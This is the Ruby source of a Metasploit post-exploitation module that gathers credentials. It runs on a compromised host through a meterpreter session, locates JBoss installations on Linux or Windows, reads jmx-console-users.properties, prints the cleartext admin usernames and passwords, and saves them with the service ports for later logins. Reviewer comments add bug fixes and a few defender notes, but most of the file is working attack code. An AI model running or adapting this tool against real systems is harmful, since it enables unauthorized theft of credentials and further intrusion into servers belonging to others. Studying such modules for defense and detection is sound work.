Path: blob/master/modules/post/multi/gather/jboss_gather.rb
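##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

# Post module that looks for JBoss 4/5/6 installations on a host with an
# existing meterpreter session, reads `jmx-console-users.properties`, and stores
# every `user=password` line it finds in the framework credential database.
#
# Defender notes, derived from the commands and paths used below:
# * Linux hosts see `locate` and `printenv` executed; Windows hosts see
#   `WMIC PROCESS get Caption,Commandline` and `cmd /c dir <home>\server`.
#   These process launches are the host-side artifacts of a run.
# * The properties file is treated as cleartext `user=password` pairs, so the
#   effective control is file-system permissions on that file and on the JBoss
#   configuration directories that reveal the listening ports.
# * XML files are read from the remote host and parsed locally without explicit
#   parse options.
#   NOTE(review): confirm the bundled Nokogiri defaults keep entity
#   substitution and network access disabled for this untrusted input.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'JBoss Credential Collector',
        'Description' => %q{
          This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Koen Riepe ([email protected])' ],
        'Platform' => [ 'linux', 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Stores one username/password pair and an untried login for the `jboss`
  # service in the framework database.
  #
  # @param user [String, nil] account name; nothing is stored when nil or empty
  # @param pass [String, nil] cleartext password; nothing is stored when nil or empty
  # @param port [Integer, Object] service port; anything that is not an Integer
  #   is replaced by 8080
  def report_creds(user, pass, port)
    # A malformed properties line can hand us nil here; the original called
    # `empty?` on it and raised NoMethodError.
    return if user.nil? || pass.nil? || user.empty? || pass.empty?

    # Assemble data about the credential objects we will be creating
    credential_data = {
      origin_type: :session,
      post_reference_name: fullname,
      private_data: pass,
      private_type: :password,
      session_id: session_db_id,
      username: user,
      workspace_id: myworkspace_id
    }

    credential_core = create_credential(credential_data)

    unless port.is_a?(Integer)
      print_error('Failed to detect port, defaulting to 8080 for creds database')
      port = 8080
    end

    login_data = {
      core: credential_core,
      status: Metasploit::Model::Login::Status::UNTRIED,
      address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
      port: port,
      service_name: 'jboss',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }
    create_credential_login(login_data)
  end

  # Reads each properties file and reports the `user=password` pairs in it.
  #
  # @param file [Array<String>] paths of `jmx-console-users.properties` files
  # @param ports [Array<Integer>] ports, matched to `file` by position
  def getpw(file, ports)
    # each_with_index keeps the file/port pairing stable; the original bumped a
    # manual counter that was skipped whenever a file could not be read.
    file.each_with_index do |pwfile, idx|
      begin
        print_status("Getting passwords from: #{pwfile}")
        lines = read_file(pwfile).split("\n")
      rescue StandardError
        print_error("Cannot open #{pwfile}, you probably do not have permissions to open the file.")
        next
      end

      lines.each do |line|
        next if line.include?('#')

        # Split on the first '=' only so a password containing '=' is kept
        # whole; chomp drops the trailing "\r" left by CRLF files.
        user, pass = line.chomp.split('=', 2)
        next if user.nil? || pass.nil? || user.empty? || pass.empty?

        print_good("Credentials found - Username: #{user} Password: #{pass}")
        report_creds(user, pass, ports[idx])
      end
    end
  end

  # Linux path: for every `jar-versions.xml` whose path mentions "jboss",
  # determines the major version and gathers credentials for it.
  #
  # @param array [Array<String>] candidate `jar-versions.xml` paths
  def getversion(array)
    # The original `while` loop used `next` in its rescue without advancing the
    # index, which spun forever on the first unreadable file. It also kept the
    # version found for one file when looking at the following ones.
    array.each do |path|
      next unless path.downcase.include?('jboss')

      begin
        file = read_file(path)
      rescue StandardError
        print_error("Cannot open #{path}, you probably do not have permissions to open the file.")
        next
      end

      version = jbossweb_version(file)
      next if version == 'NONE'

      print_status("Found a JBoss installation version: #{version}")
      home = readhome(cmd_exec('printenv').split("\n"))
      pwfiles = getpwfiles(cmd_exec('locate jmx-console-users.properties').split("\n"), home, version)
      listenports = getports(version)
      getpw(pwfiles, listenports)
    end
  end

  # Windows path: same as #getversion, but instances are enumerated below the
  # JBoss home directory instead of being located system-wide.
  #
  # @param array [Array<String>] candidate `jar-versions.xml` paths
  # @param home [String] JBoss home directory taken from the process listing
  def wingetversion(array, home)
    array.each do |path|
      next unless path.downcase.include?('jboss')

      # Handled like the Linux variant so one unreadable file does not abort
      # the whole run.
      begin
        file = read_file(path)
      rescue StandardError
        print_error("Cannot open #{path}, you probably do not have permissions to open the file.")
        next
      end

      version = jbossweb_version(file)
      next if version == 'NONE'

      print_status("Found a JBoss installation version: #{version}")
      instances = wingetinstances(home, version)
      pwfiles = winpwfiles(instances)
      listenports = wingetport(instances)
      getpw(pwfiles, listenports)
    end
  end

  # Extracts the value of JBOSS_HOME from `printenv` output.
  #
  # @param array [Array<String>] environment lines
  # @return [String] the last JBOSS_HOME value seen, or '' when none is set
  def readhome(array)
    home = ''
    array.each do |item|
      next unless item.include?('JBOSS_HOME')

      # A line that mentions JBOSS_HOME without a value used to set home to nil.
      value = item.split('JBOSS_HOME=')[1]
      home = value if value
    end
    home
  end

  # Keeps the located properties files that belong to this installation.
  #
  # @param array [Array<String>] paths returned by `locate`
  # @param home [String] JBoss home directory ('' matches every path)
  # @param version [String] major version digit
  # @return [Array<String>] paths containing both `home` and `version`
  def getpwfiles(array, home, version)
    # The original tested `include?(home && version)`, which evaluates to
    # `include?(version)` alone and never looked at `home`.
    home = home.to_s
    array.select { |location| location.include?(home) && location.include?(version) }
  end

  # Linux path: collects the HTTP ports configured for the given version.
  #
  # @param version [String] major version digit used to filter located files
  # @return [Array<Integer>] ports in the order they were found
  def getports(version)
    type1 = cmd_exec('locate bindings-jboss-beans.xml').split("\n")
    type2 = cmd_exec('locate jboss-web.deployer/server.xml').split("\n")
    port = []

    type1.each do |file1|
      next unless file1 && file1.include?(version)

      print_status("Attempting to extract JBoss service ports from: #{file1}")
      begin
        file1_read = read_file(file1).split("\n")
      rescue StandardError
        print_error("Cannot open #{file1}, you probably do not have permissions to open the file.")
        next
      end
      port.concat(binding_ports(file1_read))
    end

    type2.each do |file2|
      next unless file2 && file2.include?(version)

      print_status("Attempting to extract JBoss service ports from: #{file2}")
      begin
        xml2 = read_file(file2)
      rescue StandardError
        print_error("Cannot open #{file2}, you probably do not have permissions to open the file.")
        next
      end
      portnr = connector_port(xml2)
      port.push(portnr) if portnr
    end
    port
  end

  # Entry point for non-Windows sessions.
  def gathernix
    print_status('Unix OS detected, attempting to locate JBoss services')
    getversion(cmd_exec('locate jar-versions.xml').split("\n"))
  end

  # Finds JBoss home directories from the command lines of running java.exe
  # processes.
  #
  # @return [Array<String>] home directories, one per matching process
  def winhome
    home = []
    cmd_exec('WMIC PROCESS get Caption,Commandline').split("\n").each do |line|
      lowered = line.downcase
      next unless lowered.include?('java.exe') && lowered.include?('jboss')

      print_status('JBoss service found')
      # A matching process without a quoted -classpath argument used to raise
      # NoMethodError on nil.
      classpath = line.split('-classpath "')[1]
      next if classpath.nil?

      parse = classpath.split('\\bin\\')[0]
      next if parse.nil? || parse.empty?

      candidate = parse[0] == ';' ? parse.split(';')[1] : parse
      home.push(candidate) if candidate
    end
    home
  end

  # Lists server instance directories below `<home>\server`.
  #
  # @param home [String] JBoss home directory
  # @param version [String] major version digit the instance path must contain
  # @return [Array<String>] instance directory paths
  def wingetinstances(home, version)
    instances = []
    instance_location = "#{home}\\server"
    # The path comes from the remote process listing; quoting keeps a path with
    # spaces (or shell metacharacters) as a single argument to `dir`.
    exec = cmd_exec("cmd /c dir \"#{instance_location}\"").split("\n")
    exec.each do |instance|
      name = instance.split('<DIR>')[1]
      # Skips "." and ".." as well as any directory with a dot in its name.
      next unless name && !name.strip.include?('.')

      instance_path = "#{home}\\server\\#{name.strip}"
      instances.push(instance_path) if instance_path.include?(version)
    end
    instances
  end

  # @param instances [Array<String>] instance directory paths
  # @return [Array<String>] properties files that exist on the remote host
  def winpwfiles(instances)
    instances
      .map { |seed| "#{seed}\\conf\\props\\jmx-console-users.properties" }
      .select { |file_path| exist?(file_path) }
  end

  # Windows path: collects the HTTP ports configured for each instance.
  #
  # @param instances [Array<String>] instance directory paths
  # @return [Array<Integer>] ports in the order they were found
  def wingetport(instances)
    port = []
    instances.each do |seed|
      path1 = "#{seed}\\conf\\bindingservice.beans\\META-INF\\bindings-jboss-beans.xml"
      path2 = "#{seed}\\deploy\\jboss-web.deployer\\server.xml"

      # to_s guards against read_file handing back nil for a file that vanished
      # or cannot be read after the exist? check.
      file1 = read_file(path1).to_s.split("\n") if exist?(path1)
      file2 = read_file(path2) if exist?(path2)

      if file1
        print_status("Attempting to extract JBoss service ports from: #{path1}")
        port.concat(binding_ports(file1))
      end

      next unless file2

      print_status("Attempting to extract JBoss service ports from: #{path2}")
      portnr = connector_port(file2)
      port.push(portnr) if portnr
    end
    port
  end

  # Entry point for Windows sessions.
  def gatherwin
    print_status('Windows OS detected, enumerating services')
    home_array = winhome

    if home_array.empty?
      print_status('No JBoss service has been found')
      return
    end

    home_array.each do |home|
      wingetversion(["#{home}\\jar-versions.xml"], home)
    end
  end

  # Dispatches to the Windows or Unix gatherer based on the session's sysinfo.
  def run
    begin
      os = sysinfo['OS']
    rescue StandardError
      os = nil
    end

    if os.nil?
      print_error('sysinfo function not available, you are probably using a wrong meterpreter.')
      return
    end

    if os.include?('Windows')
      gatherwin
    else
      gathernix
    end
  rescue StandardError => e
    # The original reported every failure as a sysinfo problem, which hid the
    # real cause of errors raised further down.
    print_error("JBoss credential gathering failed: #{e.class}: #{e.message}")
  end

  private

  # Returns the first character of the specVersion of `jbossweb.jar` listed in
  # a jar-versions.xml document, or 'NONE' when it is not listed.
  def jbossweb_version(xml)
    version = 'NONE'
    Nokogiri::XML(xml.to_s).xpath('//jar-versions//jar').each do |node|
      next unless node['name'] == 'jbossweb.jar'

      # A jar entry without specVersion used to raise NoMethodError on nil.
      spec = node['specVersion'].to_s
      version = spec[0] unless spec.empty?
    end
    version
  end

  # Scans bindings-jboss-beans.xml lines for port properties that follow the
  # `deploy/httpha-invoker.sar` marker, stopping at the closing bean once a
  # port has been seen.
  def binding_ports(lines)
    found = []
    parse = false
    portfound = false
    lines.each do |line|
      if line.strip.include?('deploy/httpha-invoker.sar')
        parse = true
      elsif (line.strip == '</bean>') && portfound
        parse = false
      elsif parse && line.include?('<property name="port">')
        # to_s covers a line that ends right after the opening tag.
        portnr = line.split('<property name="port">')[1].to_s.split('<')[0].to_i
        found.push(portnr)
        portfound = true
        print_good("JBoss port found: #{portnr}")
      end
    end
    found
  end

  # Returns the port of the first Connector in server.xml whose protocol
  # mentions HTTP, or nil when there is none.
  def connector_port(xml)
    Nokogiri::XML(xml.to_s).xpath('//Server//Connector').each do |connector|
      # A Connector without a protocol attribute used to raise on nil.
      next unless connector['protocol'].to_s.include?('HTTP')

      portnr = connector['port'].to_i
      print_good("JBoss port found: #{portnr}")
      return portnr
    end
    nil
  end
end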